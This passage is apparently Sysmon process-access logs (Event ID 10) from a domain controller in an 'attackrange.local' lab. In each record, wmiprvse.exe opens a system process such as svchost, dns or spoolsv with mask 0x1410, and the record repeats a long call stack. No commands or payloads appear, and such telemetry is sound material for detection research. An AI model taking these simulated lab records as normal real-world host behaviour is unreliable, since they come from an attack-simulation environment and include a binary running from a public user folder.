Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.905{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:50.889{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 